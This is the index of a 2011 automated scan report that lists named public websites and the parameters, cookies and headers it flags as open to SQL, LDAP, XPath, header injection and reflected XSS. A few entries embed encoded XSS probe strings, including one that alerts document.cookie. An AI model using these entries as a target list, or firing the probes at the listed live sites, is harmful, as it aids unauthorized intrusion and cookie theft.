Report generated by CloudScan Vulnerability Crawler at Mon Jan 31 09:52:09 CST 2011.

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

XSS Home | XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler |

Loading

1. SQL injection

1.1. http://ad.doubleclick.net/adi/N3382.no_url_specifiedOX2487/B5076164.5 [TargetID parameter]

1.2. http://ad.doubleclick.net/adi/N3973.MSN/B4412732.159 [PG parameter]

1.3. http://ad.doubleclick.net/adi/N3973.MSN/B4412732.159 [sz parameter]

1.4. http://ad.doubleclick.net/adi/N6036.149339.MICROSOFTONLINE/B5123903.4 [&PID parameter]

1.5. http://amch.questionmarket.com/adsc/d852149/4/864449/decide.php [REST URL parameter 3]

1.6. http://assets.rubiconproject.com/static/rtb/sync-min.html [REST URL parameter 3]

1.7. http://assets.rubiconproject.com/static/rtb/sync-min.html/ [REST URL parameter 3]

1.8. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/16566708061@x90 [id cookie]

1.9. http://english.aljazeera.net/news/middleeast/2011/01/201113085252994161.html [REST URL parameter 1]

1.10. http://english.aljazeera.net/news/middleeast/2011/01/201113085252994161.html [REST URL parameter 2]

1.11. http://english.aljazeera.net/news/middleeast/2011/01/201113085252994161.html [REST URL parameter 3]

1.12. http://english.aljazeera.net/news/middleeast/2011/01/201113085252994161.html [REST URL parameter 4]

1.13. http://forums.silverlight.net/forums/topicsactive.aspx [Referer HTTP header]

1.14. http://forums.silverlight.net/user/viewonline.aspx [ASP.NET_SessionId cookie]

1.15. http://forums.silverlight.net/user/viewonline.aspx [Referer HTTP header]

1.16. http://forums.silverlight.net/user/viewonline.aspx [User-Agent HTTP header]

1.17. http://forums.silverlight.net/user/viewonline.aspx [name of an arbitrarily supplied request parameter]

1.18. http://forums.silverlight.net/user/viewonline.aspx [omniID cookie]

1.19. http://js.revsci.net/gateway/gw.js [REST URL parameter 2]

1.20. http://redacted/ [CC cookie]

1.21. http://redacted/ [s_sq cookie]

1.22. http://redacted/detail/stock_quote [ATC_ID cookie]

1.23. http://redacted/detail/stock_quote [Referer HTTP header]

1.24. http://redacted/detail/stock_quote [Sample cookie]

1.25. http://redacted/detail/stock_quote [expid cookie]

1.26. http://redacted/detail/stock_quote [name of an arbitrarily supplied request parameter]

1.27. http://redacted/inc/Attributions.asp [User-Agent HTTP header]

1.28. http://redacted/inc/Views/Shared/Core/Content/js/async/jasync.js [userCh cookie]

1.29. http://redacted/inc/Views/Shared/Core/Content/js/hotmaildata/getmaildata.js [s_sq cookie]

1.30. http://redacted/inc/Views/Shared/Core/Content/js/hotmaildata/unreadcount.js [CC cookie]

1.31. http://redacted/inc/Views/Shared/Core/Content/js/utilities/cookies.js [MC1 cookie]

1.32. http://redacted/inc/Views/Shared/Core/Content/js/utilities/cookies.js [MUID cookie]

1.33. http://redacted/inc/Views/Shared/Core/Content/js/utilities/getcookie.js [CULTURE cookie]

1.34. http://redacted/inc/Views/Shared/Core/Content/js/utilities/getcookie.js [v1st cookie]

1.35. http://redacted/inc/Views/Shared/Core/Content/js/utilities/stringutils.js [v1st cookie]

1.36. http://redacted/inc/Views/Shared/Core/Content/js/utility.js [SRCHHPGUSR cookie]

1.37. http://redacted/inc/css/ww.css [REST URL parameter 2]

1.38. http://redacted/inc/css/ww.css [User-Agent HTTP header]

1.39. http://redacted/inc/scr/ajaxquotes.js [Sample cookie]

1.40. http://redacted/inc/scr/userchoice.js [MC1 cookie]

1.41. http://redacted/inc/scr/userchoice.js [Referer HTTP header]

1.42. http://redacted/inc/scr/userchoice.js [__qca cookie]

1.43. http://redacted/inc/scr/ww.js [mh cookie]

1.44. http://redacted/investor/StockRating/srsmain.asp [name of an arbitrarily supplied request parameter]

1.45. http://redacted/investor/StockRating/srstopstocksresults.aspx [MUID cookie]

1.46. http://redacted/investor/StockRating/srstopstocksresults.aspx [expid cookie]

1.47. http://redacted/investor/StockRating/srstopstocksresults.aspx [v1st cookie]

1.48. http://redacted/investor/StockRating/srstopstocksresults.aspx [v1st cookie]

1.49. http://redacted/investor/charts/chartdl.aspx [Referer HTTP header]

1.50. http://redacted/investor/charts/chartdl.aspx [__qca cookie]

1.51. http://redacted/investor/charts/chartdl.aspx [expid cookie]

1.52. http://redacted/investor/charts/chartdl.aspx [v1st cookie]

1.53. http://redacted/investor/home.aspx [CC cookie]

1.54. http://redacted/investor/home.aspx [CULTURE cookie]

1.55. http://redacted/investor/home.aspx [User-Agent HTTP header]

1.56. http://redacted/investor/market/exchangerates.aspx [Referer HTTP header]

1.57. http://redacted/investor/market/exchangerates.aspx [Sample cookie]

1.58. http://redacted/investor/market/treasuries.aspx [REST URL parameter 1]

1.59. http://redacted/investor/market/treasuries.aspx [s_cc cookie]

1.60. http://redacted/investor/market/usindex.aspx [CC cookie]

1.61. http://redacted/investor/market/usindex.aspx [MC1 cookie]

1.62. http://redacted/investor/market/worldmarkets.aspx [CULTURE cookie]

1.63. http://redacted/investor/market/worldmarkets.aspx [Referer HTTP header]

1.64. http://redacted/investor/market/worldmarkets.aspx [expid cookie]

1.65. http://redacted/investor/partsub/funds/etfperformancetracker.aspx [User-Agent HTTP header]

1.66. http://redacted/investor/partsub/funds/etfperformancetracker.aspx [name of an arbitrarily supplied request parameter]

1.67. http://redacted/investor/partsub/funds/etfperformancetracker.aspx [s parameter]

1.68. http://redacted/investor/partsub/funds/etfperformancetracker.aspx [s_cc cookie]

1.69. http://redacted/investor/portfolio-manager/portfolio.aspx [REST URL parameter 2]

1.70. http://redacted/investor/portfolio-manager/portfolio.aspx [userCh cookie]

1.71. http://redacted/money.search [MUID cookie]

1.72. http://redacted/money.search [User-Agent HTTP header]

1.73. http://redacted/money.search [name of an arbitrarily supplied request parameter]

1.74. http://recruiting.scout.com/a.z [c parameter]

1.75. http://recruiting.scout.com/a.z [pid parameter]

1.76. http://recruiting.scout.com/a.z [yr parameter]

1.77. http://technolog.msnbc.redacted/ [name of an arbitrarily supplied request parameter]

1.78. http://technolog.msnbc.redacted/_news/2010/08/16/4904611-north-korea-welcome-to-twitter [REST URL parameter 2]

1.79. http://technolog.msnbc.redacted/_news/2010/08/16/4904611-north-korea-welcome-to-twitter [REST URL parameter 3]

1.80. http://technolog.msnbc.redacted/_news/2010/08/16/4904611-north-korea-welcome-to-twitter [REST URL parameter 4]

1.81. http://technolog.msnbc.redacted/_news/2010/08/30/5002284-thinkpad-maker-lenovo-creating-ebox-game-console [REST URL parameter 2]

1.82. http://technolog.msnbc.redacted/_news/2011/01/24/5907778-apple-calls-to-award-woman-10k-she-hangs-up [REST URL parameter 4]

1.83. http://technolog.msnbc.redacted/_news/2011/01/25/5914564-woman-tries-to-smuggle-44-iphones-in-her-stockings [REST URL parameter 2]

1.84. http://technolog.msnbc.redacted/_news/2011/01/28/5941311-what-the-egyptian-government-doesnt-want-you-to-see [REST URL parameter 2]

1.85. http://technolog.msnbc.redacted/_static/feeds/3147.xml [REST URL parameter 2]

1.86. http://technolog.msnbc.redacted/blackberry [name of an arbitrarily supplied request parameter]

1.87. http://technolog.msnbc.redacted/facebook [name of an arbitrarily supplied request parameter]

1.88. http://technolog.msnbc.redacted/featured [name of an arbitrarily supplied request parameter]

1.89. http://technolog.msnbc.redacted/justin-bieber [name of an arbitrarily supplied request parameter]

1.90. http://technolog.msnbc.redacted/mark-zuckerberg [REST URL parameter 1]

1.91. http://technolog.msnbc.redacted/xbox [REST URL parameter 1]

1.92. http://technolog.msnbc.redacted/xbox [name of an arbitrarily supplied request parameter]

1.93. http://today.msnbc.redacted/id/41319614/ns/today-entertainment/ [REST URL parameter 2]

1.94. http://redcated/APM/iview/139941180/direct [name of an arbitrarily supplied request parameter]

1.95. http://redcated/APM/iview/148848786/direct [;wi.728;hi.90/01?click parameter]

1.96. http://redcated/APM/iview/148848786/direct [AA002 cookie]

1.97. http://redcated/APM/iview/148848786/direct [MUID cookie]

1.98. http://redcated/APM/iview/148848786/direct [MUID cookie]

1.99. http://redcated/APM/iview/148848786/direct [REST URL parameter 1]

1.100. http://redcated/APM/iview/148848786/direct [Referer HTTP header]

1.101. http://redcated/APM/iview/148848786/direct [Referer HTTP header]

1.102. http://www.bing.com/videos/browse [name of an arbitrarily supplied request parameter]

1.103. http://www.bing.com/videos/results.aspx [Referer HTTP header]

1.104. http://www.bing.com/videos/results.aspx [SRCHUID cookie]

1.105. http://www.bing.com/videos/results.aspx [User-Agent HTTP header]

1.106. http://www.bing.com/videos/results.aspx [User-Agent HTTP header]

1.107. http://www.msnbc.redacted/id/21134540/vp/41328239 [REST URL parameter 4]

1.108. http://www.msnbc.redacted/id/24780215/ns/technology_and_science-games [REST URL parameter 2]

1.109. http://www.msnbc.redacted/id/37643077 [REST URL parameter 2]

1.110. http://www.msnbc.redacted/id/37643077 [name of an arbitrarily supplied request parameter]

1.111. http://www.msnbc.redacted/id/41164445/ns/world_news-africa/ [REST URL parameter 2]

1.112. http://www.msnbc.redacted/id/41164445/ns/world_news-africa/ [REST URL parameter 4]

1.113. http://www.msnbc.redacted/id/41164445/ns/world_news-africa/ [name of an arbitrarily supplied request parameter]

1.114. http://www.msnbc.redacted/id/41323843/ns/world_news-mideastn_africa/ [REST URL parameter 3]

1.115. http://www.msnbc.redacted/id/41323843/ns/world_news-mideastn_africa/ [REST URL parameter 4]

1.116. http://www.msnbc.redacted/id/41324344/ns/world_news-south_and_central_asia/ [REST URL parameter 2]

1.117. http://www.msnbc.redacted/id/41326456/ns/business-media_biz/ [name of an arbitrarily supplied request parameter]

1.118. http://www.msnbc.redacted/id/41326705/ns/world_news-south_and_central_asia/ [name of an arbitrarily supplied request parameter]

1.119. http://www.msnbc.redacted/id/41327238/ns/us_news-crime_and_courts/ [REST URL parameter 3]

1.120. http://www.msnbc.redacted/id/41327817/ns/world_news-mideastn_africa/ [name of an arbitrarily supplied request parameter]

1.121. http://www.msnbc.redacted/id/41327924/ns/world_news-europe/ [REST URL parameter 3]

1.122. http://www.msnbc.redacted/id/41327924/ns/world_news-europe/ [name of an arbitrarily supplied request parameter]

1.123. http://www.msnbc.redacted/id/41328059/ns/us_news/ [name of an arbitrarily supplied request parameter]

1.124. http://www.msnbc.redacted/id/41328834/ns/world_news-europe/ [REST URL parameter 3]

1.125. http://www.msnbc.redacted/id/41330515/ns/us_news-life/ [REST URL parameter 2]

1.126. http://www.msnbc.redacted/id/41330876/ns/world_news-europe/ [REST URL parameter 1]

1.127. http://www.msnbc.redacted/id/41330876/ns/world_news-europe/ [name of an arbitrarily supplied request parameter]

1.128. http://www.msnbc.redacted/id/8004316/ [name of an arbitrarily supplied request parameter]

1.129. http://www.polls.newsvine.com/_nv/cms/help/faq [REST URL parameter 3]

1.130. http://www.polls.newsvine.com/_static/css/7df13afbd185e2574d9f79651dc425a61a7d8525.css [REST URL parameter 1]

1.131. http://www.polls.newsvine.com/_static/css/abc971d9360e9443226fdd00adea8012ad3cb93a.css [REST URL parameter 1]

1.132. http://www.polls.newsvine.com/_vine/search [name of an arbitrarily supplied request parameter]

1.133. http://www.polls.newsvine.com/environment [name of an arbitrarily supplied request parameter]

1.134. http://www.popsci.com/ [name of an arbitrarily supplied request parameter]

2. LDAP injection

2.1. http://ad.doubleclick.net/adi/N2998.7981.MICROSOFTONLINEL.P./B5115763.6 [TargetID parameter]

2.2. http://ad.doubleclick.net/adi/N3382.no_url_specifiedOX2487/B5076164.5 [TargetID parameter]

2.3. http://ad.doubleclick.net/adi/N3382.no_url_specifiedOX2487/B5076164.5 [UIT parameter]

2.4. http://ad.doubleclick.net/adi/N6036.149339.MICROSOFTONLINE/B5123903.4 [&PID parameter]

2.5. http://ad.doubleclick.net/adj/N4478.redactedOX2487/B5084478.4 [AN parameter]

2.6. http://assets.rubiconproject.com/static/rtb/sync-min.html/ [REST URL parameter 2]

2.7. http://click.pulse360.com/cgi-bin/clickthrough.cgi [creative parameter]

2.8. http://forums.silverlight.net/forums/53.aspx [ASP.NET_SessionId cookie]

2.9. http://login.live.com/login.srf [MUID cookie]

2.10. https://login.live.com/ppsecure/secure.srf [wla42 cookie]

2.11. http://photoblog.msnbc.redacted/_news/2011/01/28/5942494-double-whammy-on-the-sun [REST URL parameter 4]

2.12. http://photoblog.msnbc.redacted/_static/feeds/3147.xml [REST URL parameter 3]

2.13. http://rad.redacted/ADSAdClient31.dll [GetSAd parameter]

2.14. http://technolog.msnbc.redacted/_news/2010/08/19/4932582-cameron-diaz-most-dangerous-celeb-search-name [REST URL parameter 2]

2.15. http://technolog.msnbc.redacted/_news/2010/08/24/4961720-yahoo-search-results-are-now-coming-from-bing- [REST URL parameter 4]

2.16. http://technolog.msnbc.redacted/_news/2010/08/30/5002284-thinkpad-maker-lenovo-creating-ebox-game-console [REST URL parameter 1]

2.17. http://technolog.msnbc.redacted/_news/2011/01/27/5936323-online-degrees-qualify-cat-to-be-your-shrink [REST URL parameter 5]

2.18. http://technolog.msnbc.redacted/_news/2011/01/28/5942663-t-pains-facebook-tattoo-so-hardcore-its-hexacore/ [REST URL parameter 1]

2.19. http://technolog.msnbc.redacted/_news/2011/01/28/5942663-t-pains-facebook-tattoo-so-hardcore-its-hexacore/ [REST URL parameter 5]

2.20. http://technolog.msnbc.redacted/_static/feeds/3147.xml [REST URL parameter 3]

2.21. http://www.msnbc.redacted/id/32359544/ [REST URL parameter 1]

2.22. http://www.polls.newsvine.com/_nv/cms/help/faq [REST URL parameter 3]

2.23. http://www.polls.newsvine.com/_nv/cms/info/copyrightPolicy [REST URL parameter 1]

2.24. http://www.polls.newsvine.com/_static/css/abc971d9360e9443226fdd00adea8012ad3cb93a.css [REST URL parameter 1]

2.25. http://www.polls.newsvine.com/_static/js/5bf8c8108bf4cc6d7732f39059de1eecc395f3a8.js [REST URL parameter 1]

2.26. http://www.polls.newsvine.com/_vine/js/pierre [REST URL parameter 2]

3. XPath injection

3.1. http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js [REST URL parameter 3]

3.2. http://ajax.microsoft.com/ajax/jQuery/jquery-1.4.2.min.js [REST URL parameter 3]

3.3. http://blogs.silverlight.net/ScriptResource.axd [d parameter]

3.4. http://blogs.silverlight.net/ScriptResource.axd [name of an arbitrarily supplied request parameter]

3.5. http://blogs.silverlight.net/ScriptResource.axd [t parameter]

3.6. http://entertainment.redacted/news/ [REST URL parameter 1]

3.7. http://entertainment.redacted/video/ [REST URL parameter 1]

3.8. http://msn.foxsports.com/cbk/story/Baylor-70-Colorado-66-30467175 [Referer HTTP header]

3.9. http://msn.foxsports.com/cbk/story/Baylor-70-Colorado-66-30467175 [User-Agent HTTP header]

3.10. http://msn.foxsports.com/cbk/story/Baylor-70-Colorado-66-30467175 [name of an arbitrarily supplied request parameter]

3.11. http://silverlight.codeplex.com/ [name of an arbitrarily supplied request parameter]

4. HTTP header injection

4.1. http://amch.questionmarket.com/adsc/d775684/10/38973908/decide.php [ES cookie]

4.2. http://amch.questionmarket.com/adscgen/st.php [code parameter]

4.3. http://amch.questionmarket.com/adscgen/st.php [site parameter]

4.4. http://atl.whitepages.com/accipiter/adclick/CID=0000e5bbb2c762f700000000/AAMSZ=endemic_module/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS/ [name of an arbitrarily supplied request parameter]

4.5. http://atl.whitepages.com/adclick/CID=0000e376b2c762f700000000/relocate=/ [name of an arbitrarily supplied request parameter]

4.6. http://atl.whitepages.com/adclick/CID=0000ed08b2c762f700000000/relocate= [name of an arbitrarily supplied request parameter]

4.7. http://atl.whitepages.com/adclick/CID=0000ed08b2c762f700000000/relocate=/ [name of an arbitrarily supplied request parameter]

4.8. http://atl.whitepages.com/bserver/AAMALL/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS/AAMB1/AAMSZ=top_rail/AAMB2/AAMSZ=med_rect/AAMB3/AAMSZ=custom_panel/AAMB4/AAMSZ=bottom_rail/AAMB5/AAMSZ=endemic_module/AAMB6/AAMSZ=landscape_module/AAMB7/AAMSZ=teaser_link [REST URL parameter 1]

4.9. http://atl.whitepages.com/bserver/AAMALL/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS/AAMB1/AAMSZ=top_rail/AAMB2/AAMSZ=med_rect/AAMB3/AAMSZ=custom_panel/AAMB4/AAMSZ=bottom_rail/AAMB5/AAMSZ=endemic_module/AAMB6/AAMSZ=landscape_module/AAMB7/AAMSZ=teaser_link [REST URL parameter 2]

4.10. http://atl.whitepages.com/bserver/AAMALL/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS/AAMB1/AAMSZ=top_rail/AAMB2/AAMSZ=med_rect/AAMB3/AAMSZ=custom_panel/AAMB4/AAMSZ=bottom_rail/AAMB5/AAMSZ=endemic_module/AAMB6/AAMSZ=landscape_module/AAMB7/AAMSZ=teaser_link [REST URL parameter 3]

4.11. http://atl.whitepages.com/bserver/AAMALL/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS/AAMB1/AAMSZ=top_rail/AAMB2/AAMSZ=med_rect/AAMB3/AAMSZ=custom_panel/AAMB4/AAMSZ=bottom_rail/AAMB5/AAMSZ=endemic_module/AAMB6/AAMSZ=landscape_module/AAMB7/AAMSZ=teaser_link [name of an arbitrarily supplied request parameter]

4.12. http://bs.serving-sys.com/BurstingPipe/adServer.bs [eyeblaster cookie]

4.13. http://d7.zedo.com/bar/v16-401/d2/jsc/fm.js [$ parameter]

4.14. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [$ parameter]

4.15. http://redacted/home.asp [name of an arbitrarily supplied request parameter]

4.16. http://redacted/investor/home.aspx [name of an arbitrarily supplied request parameter]

5. Cross-site scripting (reflected)

5.1. http://ad.doubleclick.net/adi/N3740.MSN/B5123509.8 [&PID parameter]

5.2. http://ad.doubleclick.net/adi/N3740.MSN/B5123509.8 [AN parameter]

5.3. http://ad.doubleclick.net/adi/N3740.MSN/B5123509.8 [ASID parameter]

5.4. http://ad.doubleclick.net/adi/N3740.MSN/B5123509.8 [PG parameter]

5.5. http://ad.doubleclick.net/adi/N3740.MSN/B5123509.8 [TargetID parameter]

5.6. http://ad.doubleclick.net/adi/N3740.MSN/B5123509.8 [UIT parameter]

5.7. http://ad.doubleclick.net/adi/N3740.MSN/B5123509.8 [destination parameter]

5.8. http://ad.doubleclick.net/adi/N3740.MSN/B5123509.8 [sz parameter]

5.9. http://ad.doubleclick.net/adi/N3973.MSN/B4412732.159 [TargetID parameter]

5.10. http://ad.doubleclick.net/adi/N4319.msn/B2087123.383 [name of an arbitrarily supplied request parameter]

5.11. http://ad.doubleclick.net/adi/N4319.msn/B2087123.383 [sz parameter]

5.12. http://ad.doubleclick.net/adi/N6036.149339.MICROSOFTONLINE/B5123903 [&PID parameter]

5.13. http://ad.doubleclick.net/adi/N6036.149339.MICROSOFTONLINE/B5123903 [AN parameter]

5.14. http://ad.doubleclick.net/adi/N6036.149339.MICROSOFTONLINE/B5123903 [ASID parameter]

5.15. http://ad.doubleclick.net/adi/N6036.149339.MICROSOFTONLINE/B5123903 [PG parameter]

5.16. http://ad.doubleclick.net/adi/N6036.149339.MICROSOFTONLINE/B5123903 [PG parameter]

5.17. http://ad.doubleclick.net/adi/N6036.149339.MICROSOFTONLINE/B5123903 [TargetID parameter]

5.18. http://ad.doubleclick.net/adi/N6036.149339.MICROSOFTONLINE/B5123903 [UIT parameter]

5.19. http://ad.doubleclick.net/adi/N6036.149339.MICROSOFTONLINE/B5123903 [destination parameter]

5.20. http://ad.doubleclick.net/adi/N6036.149339.MICROSOFTONLINE/B5123903 [destination parameter]

5.21. http://ad.doubleclick.net/adi/N6036.149339.MICROSOFTONLINE/B5123903 [sz parameter]

5.22. http://ad.doubleclick.net/adi/N6036.149339.MICROSOFTONLINE/B5123903.4 [&PID parameter]

5.23. http://ad.doubleclick.net/adi/N6036.149339.MICROSOFTONLINE/B5123903.4 [AN parameter]

5.24. http://ad.doubleclick.net/adi/N6036.149339.MICROSOFTONLINE/B5123903.4 [ASID parameter]

5.25. http://ad.doubleclick.net/adi/N6036.149339.MICROSOFTONLINE/B5123903.4 [PG parameter]

5.26. http://ad.doubleclick.net/adi/N6036.149339.MICROSOFTONLINE/B5123903.4 [TargetID parameter]

5.27. http://ad.doubleclick.net/adi/N6036.149339.MICROSOFTONLINE/B5123903.4 [UIT parameter]

5.28. http://ad.doubleclick.net/adi/N6036.149339.MICROSOFTONLINE/B5123903.4 [destination parameter]

5.29. http://ad.doubleclick.net/adi/N6036.149339.MICROSOFTONLINE/B5123903.4 [sz parameter]

5.30. http://ad.doubleclick.net/adj/N2724.MSNDPM/B4753684.85 [&PID parameter]

5.31. http://ad.doubleclick.net/adj/N2724.MSNDPM/B4753684.85 [&PID parameter]

5.32. http://ad.doubleclick.net/adj/N2724.MSNDPM/B4753684.85 [&PID parameter]

5.33. http://ad.doubleclick.net/adj/N2724.MSNDPM/B4753684.85 [AN parameter]

5.34. http://ad.doubleclick.net/adj/N2724.MSNDPM/B4753684.85 [AN parameter]

5.35. http://ad.doubleclick.net/adj/N2724.MSNDPM/B4753684.85 [ASID parameter]

5.36. http://ad.doubleclick.net/adj/N2724.MSNDPM/B4753684.85 [ASID parameter]

5.37. http://ad.doubleclick.net/adj/N2724.MSNDPM/B4753684.85 [PG parameter]

5.38. http://ad.doubleclick.net/adj/N2724.MSNDPM/B4753684.85 [TargetID parameter]

5.39. http://ad.doubleclick.net/adj/N2724.MSNDPM/B4753684.85 [TargetID parameter]

5.40. http://ad.doubleclick.net/adj/N2724.MSNDPM/B4753684.85 [TargetID parameter]

5.41. http://ad.doubleclick.net/adj/N2724.MSNDPM/B4753684.85 [UIT parameter]

5.42. http://ad.doubleclick.net/adj/N2724.MSNDPM/B4753684.85 [UIT parameter]

5.43. http://ad.doubleclick.net/adj/N2724.MSNDPM/B4753684.85 [destination parameter]

5.44. http://ad.doubleclick.net/adj/N2724.MSNDPM/B4753684.85 [destination parameter]

5.45. http://ad.doubleclick.net/adj/N2724.MSNDPM/B4753684.85 [sz parameter]

5.46. http://ad.doubleclick.net/adj/N2724.MSNDPM/B4753684.85 [sz parameter]

5.47. http://ad.doubleclick.net/adj/N4492.MSN/B5014254.31 [&PID parameter]

5.48. http://ad.doubleclick.net/adj/N4492.MSN/B5014254.31 [AN parameter]

5.49. http://ad.doubleclick.net/adj/N4492.MSN/B5014254.31 [ASID parameter]

5.50. http://ad.doubleclick.net/adj/N4492.MSN/B5014254.31 [PG parameter]

5.51. http://ad.doubleclick.net/adj/N4492.MSN/B5014254.31 [TargetID parameter]

5.52. http://ad.doubleclick.net/adj/N4492.MSN/B5014254.31 [UIT parameter]

5.53. http://ad.doubleclick.net/adj/N4492.MSN/B5014254.31 [destination parameter]

5.54. http://ad.doubleclick.net/adj/N4492.MSN/B5014254.31 [sz parameter]

5.55. http://ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260/45.0.js.300x250/1296350884** [REST URL parameter 2]

5.56. http://ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260/45.0.js.300x250/1296350884** [REST URL parameter 3]

5.57. http://ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260/45.0.js.300x250/Insert_Random_Number [REST URL parameter 2]

5.58. http://ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260/45.0.js.300x250/Insert_Random_Number [REST URL parameter 3]

5.59. http://ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260/45.0.js.300x250/Insert_Random_Number [click parameter]

5.60. http://ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260/45.0.js.300x250/Insert_Random_Number [name of an arbitrarily supplied request parameter]

5.61. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1110508137 [&PID parameter]

5.62. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1110508137 [AN parameter]

5.63. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1110508137 [ASID parameter]

5.64. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1110508137 [PG parameter]

5.65. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1110508137 [REST URL parameter 2]

5.66. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1110508137 [REST URL parameter 3]

5.67. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1110508137 [TargetID parameter]

5.68. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1110508137 [UIT parameter]

5.69. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1110508137 [click parameter]

5.70. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1110508137 [name of an arbitrarily supplied request parameter]

5.71. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392426** [&PID parameter]

5.72. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392426** [10,1,103;1920;1200;http%3A_@2F_@2Fredacted_@2Finvestor_@2Fcharts_@2Fchartdl.aspx_@3Fsymbol%3Dindu22b72%2522%3Balertdocument.cookie_@2F_@2F2badde9cef5?click parameter]

5.73. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392426** [AN parameter]

5.74. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392426** [ASID parameter]

5.75. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392426** [PG parameter]

5.76. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392426** [TargetID parameter]

5.77. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392426** [UIT parameter]

5.78. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392426** [name of an arbitrarily supplied request parameter]

5.79. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392449** [&PID parameter]

5.80. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392449** [10,1,103;1920;1200;http%3A_@2F_@2Fredacted_@2Finvestor_@2Fcharts_@2Fchartdl.aspx_@3Fsymbol%3Dindu22b72%2522%3Balert1_@2F_@2F2badde9cef5?click parameter]

5.81. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392449** [AN parameter]

5.82. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392449** [ASID parameter]

5.83. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392449** [PG parameter]

5.84. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392449** [TargetID parameter]

5.85. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392449** [UIT parameter]

5.86. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392449** [name of an arbitrarily supplied request parameter]

5.87. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1798982473 [&PID parameter]

5.88. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1798982473 [AN parameter]

5.89. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1798982473 [ASID parameter]

5.90. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1798982473 [PG parameter]

5.91. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1798982473 [REST URL parameter 2]

5.92. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1798982473 [REST URL parameter 3]

5.93. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1798982473 [TargetID parameter]

5.94. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1798982473 [UIT parameter]

5.95. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1798982473 [click parameter]

5.96. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1798982473 [name of an arbitrarily supplied request parameter]

5.97. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350847** [&PID parameter]

5.98. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350847** [10,1,103;1920;1200;http%3A_@2F_@2Fmoney.redacted_@2Finvesting_@3F4755d%2522%253E%253Cscript%253Ealert1%253C_@2Fscript%253E10ee24922f0%3D1?click parameter]

5.99. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350847** [AN parameter]

